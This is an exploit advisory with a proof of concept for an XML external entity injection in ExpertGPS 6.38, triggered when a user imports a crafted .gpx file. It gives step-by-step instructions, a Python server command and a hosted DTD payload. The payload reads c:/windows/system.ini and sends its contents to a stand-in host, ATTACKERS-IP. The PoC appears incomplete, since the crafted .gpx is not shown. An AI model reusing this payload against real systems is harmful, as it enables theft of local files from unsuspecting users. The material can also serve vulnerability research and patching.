Expertgps 6.38 xml external entity injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-02-07 |
Type : webapps |
Platform : xml
This exploit / vulnerability Expertgps 6.38 xml external entity injection is for educational purposes only and if it is used you will do on your own risk!
==================
Background:
==================
ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellin, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format which is based on XML.
==================
Vulnerability:
==================
By having a user import a crafted .gpx file (XML Based GPS data file), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.)Open ExpertGPS.exe
2.)Select File -> Import Data from Other Programs...
3.)Select the crafted route.gpx file (with listener open on ATTACKERS-IP) and click "Open".
==================
Proof of Concept:
==================
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)
b.) Hosted "payload.dtd"
<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">
==================
Additional Attack Vectors:
==================
There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE.